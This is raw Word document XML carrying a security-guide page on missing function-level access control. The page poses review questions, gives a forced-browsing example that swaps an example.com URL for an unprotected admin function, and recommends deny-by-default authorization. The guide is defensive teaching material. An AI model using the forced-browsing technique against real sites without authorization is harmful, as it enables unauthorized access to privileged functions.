                      <w:p w14:paraId="2C46E0A5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alit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3624EFCF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gula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4210B82F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ivileg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?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676B0B4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</w:p>
                      <w:p w14:paraId="6265A3C2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oriz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</w:p>
                      <w:p w14:paraId="7048366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mply</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1D5CAB1F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hang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R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071D8EA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amet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13F6F7C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ivileg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.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="048BABD1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ranted?</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7D4B1856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onymou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</w:p>
                      <w:p w14:paraId="44F189E9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ivate</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0144946D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</w:p>
                      <w:p w14:paraId="3EFED8D6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n’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tected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1D16F45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o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way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tect</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6AA6941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perly.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="138C110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time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eve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tec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7F75BE69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ag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figuration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6316BAED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yste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sconfigured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times,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7A0E0ECE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velop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u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p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de</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="085AE695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heck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get.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="224C8B6B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="31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sy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rdest</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6D8D3E9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dentify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i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(URLs)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5EA63171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i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8C3A421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ow</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="747C44ED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</w:p>
                      <w:p w14:paraId="5E6D281D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authorized</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1CA8CFA8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ality.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="133321D2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dministrative</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2BA53B3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ey</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7CDCD90F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rge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ype</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3F8003DE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D213963" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="274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6EA3475B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08F55756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osed</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="472439A9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53C4E3CE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ocess.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="436446C1" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="31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s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78FB29AF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a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567B1B07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put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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4BC8D081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ulnerability</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="71F3D374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cam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ublic.</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="607CBFFD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72306283">
          <v:shape id="imagerId483" o:spid="_x0000_s2438" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251833856;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId483" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="45402BAF">
          <v:shape id="imagerId484" o:spid="_x0000_s2437" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251832832;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId484" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="49D8A839">
          <v:shape id="imagerId485" o:spid="_x0000_s2436" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251831808;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId485" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="17BA6FC5">
          <v:shape id="imagerId486" o:spid="_x0000_s2435" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251826688;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId486" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="665EA2F8">
          <v:shape id="imagerId487" o:spid="_x0000_s2434" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251825664;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId487" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="579EEC18">
          <v:shape id="imagerId488" o:spid="_x0000_s2433" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251830784;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId488" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="06D4330F">
          <v:shape id="imagerId489" o:spid="_x0000_s2432" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251829760;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId489" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="15B76DDD">
          <v:shape id="imagerId490" o:spid="_x0000_s2431" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251828736;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId490" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="38FE7F97">
          <v:shape id="imagerId491" o:spid="_x0000_s2430" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251827712;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId491" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1671A890">
          <v:shapetype id="_x0000_m2429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15C5496">
          <v:shape id="_x0000_s2428" type="#_x0000_m2429" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25184614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6E25C1C6">
          <v:shapetype id="_x0000_m2427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987CD7B">
          <v:shape id="_x0000_s2426" type="#_x0000_m2427" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:124pt;width:543pt;height:3pt;z-index:25167616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29E2A799">
          <v:shapetype id="_x0000_m2425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7447018">
          <v:shape id="_x0000_s2424" type="#_x0000_m2425" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:155.9pt;width:543pt;height:3pt;z-index:25167718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78D4EEB">
          <v:shapetype id="_x0000_m2423" coordsize="600,20594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3194D23">
          <v:shape id="_x0000_s2422" type="#_x0000_m2423" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:71.65pt;width:6pt;height:205.9pt;z-index:25167820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CB1014C">
          <v:shapetype id="_x0000_m2421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D8B8252">
          <v:shape id="_x0000_s2420" type="#_x0000_m2421" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.15pt;width:543pt;height:3pt;z-index:25167923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7C136917">
          <v:shapetype id="_x0000_m2419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FB38760">
          <v:shape id="_x0000_s2418" type="#_x0000_m2419" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:273.1pt;width:543pt;height:3pt;z-index:25168025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755D36A1">
          <v:shapetype id="_x0000_m2417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405A6A4">
          <v:shape id="_x0000_s2416" type="#_x0000_m2417" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7in;width:266.4pt;height:215pt;z-index:-25184512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37D6A7A3">
          <v:shapetype id="_x0000_m2415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0E9EBAF">
          <v:shape id="_x0000_s2414" type="#_x0000_m2415" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251844096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69037FC0">
          <v:shapetype id="polygon191" o:spid="_x0000_m2413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648C729">
          <v:shape id="WS_polygon191" o:spid="_x0000_s2412" type="#polygon191" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25184307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10D44A3">
          <v:shapetype id="polygon203" o:spid="_x0000_m2411" coordsize="2186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50F0BC4">
          <v:shape id="WS_polygon203" o:spid="_x0000_s2410" type="#polygon203" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:558.2pt;width:218.6pt;height:.6pt;z-index:-2518420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D431D11">
          <v:shapetype id="_x0000_m2409" coordsize="10560,72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2BEFE3A">
          <v:shape id="_x0000_s2408" type="#_x0000_m2409" style="position:absolute;left:0;text-align:left;margin-left:286.8pt;margin-top:574.3pt;width:105.6pt;height:.7pt;z-index:-2518410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42BC3E0">
          <v:shapetype id="_x0000_m2407" coordsize="2224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E0622D1">
          <v:shape id="_x0000_s2406" type="#_x0000_m2407" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:590.15pt;width:222.45pt;height:.6pt;z-index:-2518400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C729FD6">
          <v:shapetype id="polygon218" o:spid="_x0000_m2405" coordsize="1969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46AD4F2">
          <v:shape id="WS_polygon218" o:spid="_x0000_s2404" type="#polygon218" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:606.2pt;width:196.9pt;height:.6pt;z-index:-2518389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17819AA">
          <v:shapetype id="polygon223" o:spid="_x0000_m2403" coordsize="1420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77D48C1">
          <v:shape id="WS_polygon223" o:spid="_x0000_s2402" type="#polygon223" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:622.2pt;width:142.05pt;height:.55pt;z-index:-25183795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C5CDE38">
          <v:shapetype id="_x0000_m2401" coordsize="1701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1C5D678">
          <v:shape id="_x0000_s2400" type="#_x0000_m2401" style="position:absolute;left:0;text-align:left;margin-left:280.8pt;margin-top:648.2pt;width:170.15pt;height:.6pt;z-index:-25183692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DC1A86A">
          <v:shapetype id="_x0000_m2399" coordsize="2394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966B6C8">
          <v:shape id="_x0000_s2398" type="#_x0000_m2399" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:696.2pt;width:239.4pt;height:.6pt;z-index:-25183590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47F1369">
          <v:shapetype id="_x0000_m2397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A188D9E">
          <v:shape id="_x0000_s2396" type="#_x0000_m2397" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251834880;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#b3d6ac" strokeweight="2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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC8E43" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="731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F7F7F"/>
          <w:w w:val="96"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Missing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Function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Level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Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1A844B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="600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Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465216EC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5646483B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614DD9DF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02AC2312" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20CA21F6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0585AB98" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7414ACCC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5836125B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D6B1DD4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01640FA8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B95800" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F71EC24" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107CF4ED" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CCE564" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6388F721" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187DA9F9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EE6809" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0019EC0D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D816CD6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69393DD6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Forced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ccess?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406182D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a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ail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08DA6399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proper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stri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un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eve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if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19"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2B919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unction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7E143E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1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Do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I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o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avig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authoriz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unctions?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB710E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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2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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ser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ent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oriz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ecks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038CFA76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missing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52712236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3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eck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n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le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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A44F0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inform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vid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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B73846E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U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xy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vileg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ole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AC3041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vis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stric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vileg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ol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2DC3DB3F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er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spon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ik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'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bab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me</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBECB1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est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x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ppor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yp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alysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B82FF76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e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tro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plement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5B8F293B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d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llow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ng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vileg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roug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1E2DB4B2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ify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oriz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ttern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ar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5A79D89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deba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tter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llowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F772773" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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utom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ol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like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blems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69310D4A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D7B7A9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="350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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AD97D4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1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mp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rget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A653CB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URL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llow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RL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entication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dm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ights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E959E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“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="002060"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin_getappInfo”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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2BC85E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http://example.com/app/getappInfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B28DE0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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http://example.com/app/admin_getappInfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9880A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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authentic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i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</w:p>
    <w:p w14:paraId="0CE4D44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law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enticated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n-admi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ow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</w:p>
    <w:p w14:paraId="41B09051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“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="002060"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin_getappInfo”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w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y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D5C2D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lea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proper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tec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dm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s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E601A5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2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vid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‘a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‘paramet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pecify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9BB81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un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voked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ffer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tion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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB364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iffer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ole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ol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n’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nforced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w.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795E29B7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2C734F36" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB29CAA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0530FBA1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4332091C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719444CB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602026D7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C7EF320" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D41F77B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BFEFE5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C62DF3D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681ADFBB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A05E817" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA5AE6A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12212693" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD197DE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBBD78C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5448DCAA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="413" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A46588D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Forced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Access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BFD730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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Your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pplicatio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shoul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hav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consisten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n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easy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o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nalyze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AF2E98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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>authorizatio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modul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a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nvoke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from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ll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of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your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business</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B551C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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>functions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Frequently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such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rotectio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rovide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by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on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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1CEF7B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mo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pon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xterna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ppl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de.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371C397F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="32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1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Think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bou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nag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titlem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</w:p>
    <w:p w14:paraId="50D681B2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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ensur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you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ca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updat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n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audi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easily.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Don’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hard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code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503A6B38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3"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  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enforcemen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mechanism(s)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shoul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eny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ll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cces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by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C303036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default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xplici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gra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pecific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ol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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB684E7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ac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ver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unction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68153A01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4"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
